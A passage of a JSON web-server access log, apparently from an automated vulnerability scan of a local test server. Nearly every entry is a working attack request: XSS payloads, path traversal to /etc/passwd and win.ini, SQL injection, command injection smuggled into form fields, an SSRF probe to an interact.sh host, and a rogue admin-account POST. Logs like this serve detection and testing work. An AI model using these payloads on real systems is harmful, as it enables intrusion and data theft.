/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static///////../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0atype+C%3A%5CWindows%5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jw/web/; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dokuwiki/doku.php?id=wiki:welcome&at= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.454","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /@https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/websocket/index.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /smb.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///../app.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_darcs/prefs/binaries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KFpZz7DqOtqPnDfC380tvPlG6 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"::1"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /accounts/login?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.orig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..;/examples/servlets/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nbproject/project.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor_tools/module?type=files/admin\x22>¶ms=filetype=images HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"{\x22username\x22: \x22testpoc\x22, \x22has_admin_role\x22: true, \x22password\x22: \x22TestPoc!\x22, \x22email\x22: \x22testpoc@example.com\x22, \x22realname\x22: \x22poc\x22}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/users HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/snp/snoop.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/settings/values HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.js 